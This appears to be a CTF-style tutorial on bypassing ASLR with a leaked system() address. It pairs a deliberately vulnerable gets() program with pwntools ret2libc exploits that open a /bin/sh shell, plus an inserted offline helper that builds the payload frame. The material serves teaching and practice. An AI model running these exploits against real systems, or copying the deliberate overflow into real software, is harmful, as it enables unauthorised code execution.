
# ASLR Bypass with Given Leak

## The Source

{% file src="/files/-MGIXkZydbwqB-uqiIm5" %}
ASLR - 32-bit
{% endfile %}

```c
#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    // Leak the runtime address of system(), which lives inside libc
    printf("System is at: %p\n", system);

    // Unbounded read: overflows buffer and the saved return address
    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}
```

Just as we did for PIE, except this time we print the address of system.

## Analysis

```
$ ./vuln-32 
System is at: 0xf7de5f00
```

Yup, does what we expected.

{% hint style="info" %}
The address of system may end in different digits on your machine; that just means you have a different libc version.
{% endhint %}

## Exploitation

Much of this is as we did with PIE.

```python
from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
```

Note that we include the libc here. `elf.libc` is just another `ELF` object, pointing at the libc the binary would load, and it makes our lives easier because symbol offsets and string searches work on it exactly as they do on the main binary.

Parse the address of system and calculate libc base from that (as we did with PIE):

```python
p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)

# Leaked address minus the symbol's offset inside libc gives the libc base
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
```

Now we can finally ret2libc, using the `libc` `ELF` object to really simplify it for us:

```python
# Once libc.address is set, every libc.sym lookup and search() result is rebased
payload = flat(
    b'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()
```
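The two steps above (turn the leaked `system` address into a libc base, then lay out the 32-bit ret2libc frame) can be checked offline without pwntools or the binary. The block below is an added example, not code from the original page; it uses constructed sample output and assumed libc offsets (`SYSTEM_OFFSET`, `BINSH_OFFSET`, both hypothetical, in place of `libc.sym['system']` and `libc.search(b'/bin/sh')`), and adds the sanity check a practitioner wants: a correct base is always page-aligned, so a base that does not end in `000` means the offsets belong to a different libc than the one that produced the leak.

```python
import re
import struct

# Constructed sample output of vuln-32 across two runs (not real captures).
SAMPLE_RUNS = [
    "System is at: 0xf7de5f00\n",
    "System is at: 0xf7d3cf00\n",
]

# Assumed (hypothetical) offsets inside libc. In the real exploit these come
# from libc.sym['system'] and next(libc.search(b'/bin/sh')).
SYSTEM_OFFSET = 0x045f00
BINSH_OFFSET = 0x18c33a

LEAK_RE = re.compile(r"System is at: (0x[0-9a-fA-F]+)")


def parse_leak(line: str) -> int:
    """Extract the leaked system address from one line of program output."""
    m = LEAK_RE.search(line)
    if m is None:
        raise ValueError("no system leak in line")
    return int(m.group(1), 16)


def leak_matches_libc(system_leak: int, system_offset: int = SYSTEM_OFFSET) -> bool:
    """libc is mmap'd page-aligned, so leak - offset must end in 000 for the
    offsets to belong to the libc that produced the leak."""
    return (system_leak - system_offset) & 0xfff == 0


def libc_base(system_leak: int, system_offset: int = SYSTEM_OFFSET) -> int:
    """Rebase: leaked address minus the symbol's offset gives the libc base."""
    if not leak_matches_libc(system_leak, system_offset):
        raise ValueError(
            f"{system_leak:#x} - {system_offset:#x} is not page-aligned; "
            "wrong libc offsets?"
        )
    return system_leak - system_offset


def bases_from_runs(lines) -> list:
    """Compute a base for every captured run; ASLR moves the base each time."""
    return [libc_base(parse_leak(line)) for line in lines]


def build_ret2libc_32(base: int, padding: int = 32, ret: int = 0x0) -> bytes:
    """32-bit ret2libc frame: padding to the saved EIP, then system(),
    a fake return address for system, then its single argument."""
    system = base + SYSTEM_OFFSET
    binsh = base + BINSH_OFFSET
    return b"A" * padding + struct.pack("<III", system, ret, binsh)


if __name__ == "__main__":
    for line, base in zip(SAMPLE_RUNS, bases_from_runs(SAMPLE_RUNS)):
        print(f"{line.strip()} -> libc base {base:#x}")
    frame = build_ret2libc_32(bases_from_runs(SAMPLE_RUNS)[0])
    print(f"frame ({len(frame)} bytes): {frame.hex()}")
```

Note that the base differs between the two constructed runs while the low three hex digits of the leak stay the same; that is the page-granularity of ASLR, and it is why a leak that does not rebase to an `000`-aligned base is a sign of mismatched libc offsets rather than of a new randomisation.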

### Final Exploit

```python
from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

# Read the leaked address of system()
p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)

# Rebase libc from the leak
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

# 32-bit ret2libc: system(), fake return address, pointer to "/bin/sh"
payload = flat(
    b'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()
```

## 64-bit

Try it yourself :)

{% file src="/files/-MGIZ6w3y5T0Zk6EBsUz" %}
ASLR - 64-bit
{% endfile %}

## Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

```python
payload = flat(
    b'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)
```

Instead, you could do:

```python
binsh = next(libc.search(b'/bin/sh'))

# ROP(libc) resolves symbols and calling convention against the rebased libc
rop = ROP(libc)
rop.raw(b'A' * 32)      # padding up to the saved return address
rop.system(binsh)       # call system("/bin/sh")

p.sendline(rop.chain())
```

The benefit of this is that it's (arguably) more readable, but it also makes the exploit much easier to reuse in 64-bit, because the argument passing (on the stack in 32-bit, via registers and gadgets in 64-bit) is resolved for you automatically.
